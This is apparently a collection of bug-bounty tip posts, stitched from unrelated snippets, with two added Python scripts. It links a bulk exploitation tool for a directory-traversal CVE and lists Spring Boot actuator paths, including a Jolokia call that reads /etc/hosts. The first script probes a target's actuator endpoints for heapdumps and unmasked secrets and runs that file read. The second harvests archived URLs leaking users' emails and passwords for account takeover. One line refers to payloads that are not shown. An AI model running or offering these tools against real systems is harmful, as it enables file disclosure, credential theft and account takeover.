BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.
https://github.com/honoki/bbrf-client/
IDOR in Reset Password
When the user resets their password, the application makes an API request to check that the username exists. If it exists, the response comes back with Personally Identifiable Information (PII): full name, email, phone number.
By: @Maakthon
#bugbountytips
CVE-2024-40348
This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
Download: https://github.com/bigb0x/CVE-2024-40348
Brut Security pinned: «Hey everyone, thanks for being part of this awesome community! If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja»
A Practical Guide to Starting Your Cybersecurity Career in India
Brut Security published a post on Ko-fi
actuator/env
actuator/auditevents
actuator/beans
actuator/caches
actuator/configprops
actuator/health
actuator/heapdump
actuator/info
actuator/integrationgraph
actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/hosts
#bugbountytip #bugbountytips #bugbounty
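A probe script for the actuator list above, added here as an example and not part of the original post. It tries each endpoint under both the Spring Boot 2.x prefix (/actuator/) and the bare 1.x paths, rates what comes back (a reachable heapdump is critical; /env and /configprops are graded on whether sensitive values are still masked with ******, which is the Spring Boot 2.x sanitizer's default), and includes the Jolokia compilerDirectivesAdd path from the post as a file-read check. The sensitive-key regex, the severity labels and the sample /env JSON in the test are assumptions of mine, not anything from the post.

```python
import json
import re
import urllib.error
import urllib.parse
import urllib.request

# Endpoint names from the post (the duplicate configprops entry dropped).
ENDPOINTS = ["env", "auditevents", "beans", "caches", "configprops", "health",
             "heapdump", "info", "integrationgraph"]

# Jolokia path from the post. compilerDirectivesAdd parses the named file as a JVM
# compiler-directives file; the parse error it returns quotes the offending text,
# which is how /etc/hosts content ends up in the response. "!/" is Jolokia's escape
# for "/" inside an argument.
JOLOKIA_FILE_READ = ("jolokia/exec/com.sun.management:type=DiagnosticCommand/"
                     "compilerDirectivesAdd/!/etc!/hosts")

# Heuristic (my assumption) for property names worth reporting from /env, /configprops.
SENSITIVE_KEY = re.compile(r"pass|pwd|secret|token|credential|apikey|api_key", re.I)
MASK = "******"   # Spring Boot 2.x sanitizer replaces sensitive values with this


def build_targets(base):
    """Spring Boot 2.x serves /actuator/<ep>; 1.x served bare /<ep>. Probe both."""
    base = base.rstrip("/")
    urls = []
    for ep in ENDPOINTS + [JOLOKIA_FILE_READ]:
        urls.append(f"{base}/actuator/{ep}")
        urls.append(f"{base}/{ep}")
    return urls


def endpoint_of(url):
    """Map a probe URL back to the endpoint name it targets ('' if unknown)."""
    path = urllib.parse.urlsplit(url).path
    for ep in ENDPOINTS + ["jolokia"]:
        if path.endswith("/" + ep) or ("/" + ep + "/") in path:
            return ep
    return ""


def sensitive_keys(obj, path=""):
    """Walk /env or /configprops JSON; return (dotted key, value-is-masked) pairs."""
    hits = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            p = f"{path}.{k}" if path else k
            if SENSITIVE_KEY.search(k):
                val = v.get("value") if isinstance(v, dict) else v  # /env wraps values
                hits.append((p, val == MASK))
            elif isinstance(v, (dict, list)):
                hits.extend(sensitive_keys(v, p))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            hits.extend(sensitive_keys(v, f"{path}[{i}]"))
    return hits


def classify(url, status, body):
    """Severity for one probe response plus any sensitive keys found."""
    if status != 200:
        return "closed", []
    ep = endpoint_of(url)
    if ep == "heapdump":
        return "critical", []     # whole JVM heap: credentials and live session tokens
    if ep == "jolokia":
        # a readable file shows up quoted inside the DiagnosticCommand error text
        return ("critical" if "localhost" in body else "high"), []
    if ep in ("env", "configprops"):
        try:
            hits = sensitive_keys(json.loads(body))
        except ValueError:
            return "high", []
        unmasked = [k for k, masked in hits if not masked]
        return ("high" if unmasked else "medium"), hits
    return "low", []


def probe(url, timeout=5):
    """Fetch one URL; returns (status, body). Network only, not used by the test."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status, r.read(64 * 1024).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


if __name__ == "__main__":
    import sys
    for u in build_targets(sys.argv[1]):
        sev, hits = classify(u, *probe(u))
        if sev != "closed":
            print(f"[{sev}] {u}")
            for key, masked in hits:
                print(f"    {key} {'(masked)' if masked else '(UNMASKED)'}")
```

Run it as `python actuator_probe.py https://target`. A "medium" on /env still matters: even with values masked, the property names tell you which datastores, queues and cloud credentials the app holds, and a reachable /heapdump hands you the unmasked values anyway.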
If your input causes a server error (e.g. 500) when you inject a ' (for example) but you don't get reliable results with boolean-based inference, try these payloads, which should trigger the 500 only when the condition highlighted in red is true.
Permission Model Issues: $3,000,000 methodology
https://forums.cybershieldctf.com/showthread.php?tid=87
New VDP Program - https://www.sonova.com/.well-known/security.txt
While testing the site I found the registration OTP bypass error which lead to create new accounts
without verifying them and can generate different account from different number unlimited times.
YouTube
#2 OTP Bypass | Response Manipulation | Bug Bounty POC | CyberTron | #bugbounty #cybersecurity
Bug Type - Improper Authentication β Generic CWE-287
Easy Account Take Over
1. Go to http://web.archive.org
2. Put in the domain and search for URLs
3. Type %40 in the filter and search
4. You get a lot of URLs with a parameter that leaks users' email and password
By: @Sayed_v2
#BugBounty #bugbountytips
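The same hunt done against the Wayback CDX API instead of the web UI, added here as an example and not part of @Sayed_v2's post. It pulls every archived URL under a domain whose text contains %40 (the URL-encoded @ from the tip), decodes the query string, keeps URLs that carry an email address as a parameter value, and reports any password-looking parameter beside it. The CDX endpoint and its url/output/fl/collapse/filter parameters are documented by the Wayback Machine; the secret-parameter regex and the sample rows are my own constructed assumptions.

```python
import json
import re
import urllib.parse
import urllib.request

CDX = "https://web.archive.org/cdx/search/cdx"
# Parameter names that usually carry a credential next to the email (heuristic).
SECRET_PARAM = re.compile(r"pass|pwd|secret|token", re.I)
EMAIL = re.compile(r"[^@\s/?&=]+@[^@\s/?&=]+\.[a-z]{2,}", re.I)


def cdx_url(domain):
    """CDX query for every archived URL under the domain whose text contains %40.
    collapse=urlkey keeps one row per distinct URL; filter=original:<regex> is the
    CDX field filter (the %40 literal is passed URL-encoded, so it appears as %2540)."""
    q = {
        "url": f"{domain}/*",
        "output": "json",
        "fl": "original",
        "collapse": "urlkey",
        "filter": "original:.*%40.*",
    }
    return f"{CDX}?{urllib.parse.urlencode(q)}"


def extract_leaks(cdx_rows):
    """cdx_rows: JSON from the CDX API, header row first. Returns one record per
    URL whose query string carries an email address, noting any secret-looking
    parameter sitting beside it."""
    leaks = []
    for row in cdx_rows[1:]:                    # row 0 is the field-name header
        original = row[0]
        query = urllib.parse.urlsplit(original).query
        params = urllib.parse.parse_qs(query, keep_blank_values=True)  # %40 -> @
        emails = {k: v[0] for k, v in params.items() if v and EMAIL.fullmatch(v[0])}
        if not emails:
            continue
        secrets = {k: v[0] for k, v in params.items() if SECRET_PARAM.search(k)}
        leaks.append({
            "url": original,
            "emails": emails,
            "secrets": secrets,
            "severity": "credentials" if secrets else "email-only",
        })
    return leaks


def hunt(domain):
    """Live query (network); not exercised by the offline test."""
    with urllib.request.urlopen(cdx_url(domain), timeout=60) as r:
        return extract_leaks(json.load(r))


# Constructed rows in the CDX JSON layout, not real captures, for offline use.
SAMPLE_ROWS = [
    ["original"],
    ["https://example.com/login?user=alice%40example.com&pass=Winter2019"],
    ["https://example.com/reset?email=bob%40example.com"],
    ["https://example.com/about?ref=newsletter"],
]

if __name__ == "__main__":
    import sys
    leaks = hunt(sys.argv[1]) if len(sys.argv) > 1 else extract_leaks(SAMPLE_ROWS)
    for leak in leaks:
        print(f"[{leak['severity']}] {leak['url']}")
        for k, v in {**leak["emails"], **leak["secrets"]}.items():
            print(f"    {k} = {v}")
```

Run with a domain argument for a live query, or with none to see the classification on the constructed rows. The server-side filter only matches captures whose stored URL contains the literal %40; a site that archived raw @ in query strings needs a second pass with the filter changed to match @.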